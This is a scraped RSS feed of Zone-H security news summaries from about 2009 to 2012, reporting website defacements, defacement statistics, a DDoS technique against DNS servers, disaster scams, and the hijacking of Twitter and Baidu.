http://www.zone-h.org/rss/news This is a somewhat astonishing news, and once again the demonstration that alternative thinking might be the way to solve apparently unsolvable cases. I just report what was written by the hacker himself on his website. Can anyone help? &nbsp; Rome, September 10th 2012 I have a brain cancer. Yesterday I went to get my digital medical records: I have to show them to many doctors. Sadly they were in a closed, proprietary format and, thus, I could not open them using my computer, or send them in this format to all the people who could have saved my life.

==> Zone-H celebrates its 10 years!

http://www.zone-h.org/rss/news 10 years ago Zone-H opened, a little website with security news and a &quot;cybercrime archive&quot; which quickly became success story. The goals of Zone-H were to follow security trends and analyze the growing importance of hacktivism.

==> Turkish hacking group defaces UPS, TheRegister, Acer, Telegraph, Vodafone

http://www.zone-h.org/rss/news At the time of writing these websites are still defaced, with a black page written &quot;TurkguvenLigi&quot; and &quot;4 Sept. &nbsp;We TurkGuvenligi declare this day as &nbsp; World Hackers Day &nbsp;- Have fun &nbsp;;) h4ck y0u&quot;. &nbsp; &nbsp; What do ups.com, vodafone.com, theregister.co.uk, acer.com, betfair.com, nationalgeographic.com and telegraph.co.uk have in common? They all use NetNames as their registrar.

==> Zone-H banned by some Indian ISPs: some workarounds

http://www.zone-h.org/rss/news As some of you probably know, Zone-H has been banned from some indian ISPs following the E2-labs scandals and a lawsuit from E2labs and Zaki Qureshey in an indian court, who claimed our documents and articles were defamatory (great joke!). Zone-H was unable to defend itself as we didn&#39;t receive any notification from the court. What is even funnier (scarier?), is that bloggernews.net has also been banned...

==> New attack vector in DDoS observed

http://www.zone-h.org/rss/news &nbsp; This article is a result of the common research of Jakub Alimov from the Seznam.cz and minor from Zone-h.org. If you have anything to say about this, write to comments [a} zone-h{dot]org. The topic was presented at the SPI conference in Brno/CZ. While protecting the users from receiving a huge amount of the unsolicited bulk mail, a new attacking scenario against the DNS servers was observed. The scenario involves sending the spam messages to the SMTP services with a big bandwidth.

==> The old "new" Japanese scams

http://www.zone-h.org/rss/news Dear friends, in these days we all turned our minds to Japan, to the Japanese people, some of them are our friends, or some of our friends live in Japan. We would like to express the condolences to the families which lost their family members. We are deeply concerned about the injuries and losses caused by the earthquake set, tsunami flooding and the nuclear catastrophe. Nevertheless, we have to express also our anger. We already recorded first set of the scam emails asking the unaware users to donate for the charity, but as usual the money will never come to the victims.

==> Defacements Statistics 2010: Almost 1,5 million websites defaced, what's happening?

http://www.zone-h.org/rss/news Last year the Zone-H archived a sad record number, we archived 1.419.203 websites defacements. Why and how this is happening? If you are looking at on the stats, the things remain the same: file inclusion, sql injection, webdav attacks and shares misconfiguration are still at the top ranks of the attack methods used by the defacers to gain first access into the server. As an important factor influencing the stats we consider the fact that last year brought a very high number of the local linux kernel exploits.

==> Notes on the Wikileaks case

http://www.zone-h.org/rss/news First of all, we would like to emphasize that Zone-H is not related to any party in the Wikileaks case. We are do not agree nor disagree with any action happened, we just want to share our opinion on the forthcomming events. Already many news media released information about the cables, sources, how it happened etc. But now, it is clear that the Wikileaks will not stop to publish the cables. There are plenty of the mirrors all around the globe and information are shared over the Facebook and Twitter. Also the arrest of Julian Assange can&#39;t stop the day-by-day publishing of the cables.

==> Defacements Statistics 2008 - 2009 - 2010*

http://www.zone-h.org/rss/news When Zone-H started back in 2002, we were receiving an average of 2500 defacements monthly, this number keeps on increasing year after year. For example, the last month we registered over 95.000 defacements, while we only had 60.000 in 2009 for the same period. What we can also say from these numbers is that the methods used are still the same: most of the vulnerabilities exploited are on web applications. We also know from what we monitored that registrar attacks greatly increased the past years even if this number is quite low compared to the total of attacks.

==> Twitter and Baidu hijacked by "Iranian Cyber Army"

http://www.zone-h.org/rss/news You probably read that story somewhere last month, on December 17 2009 Twitter's homepage has been replaced by this message: &quot;Iranian Cyber Army THIS SITE HAS BEEN HACKED BY IRANIAN CYBER ARMY iRANiAN.CYBER.ARMY@GMAIL.COM U.S.A. Think They Controlling And Managing Internet By Their Access, But THey Don&rsquo;t, We Control And Manage Internet By Our Power, So Do Not Try To Stimulation Iranian Peoples To&hellip;. NOW WHICH COUNTRY IN EMBARGO LIST? IRAN? USA? WE PUSH THEM IN EMBARGO LIST ;) Take Care.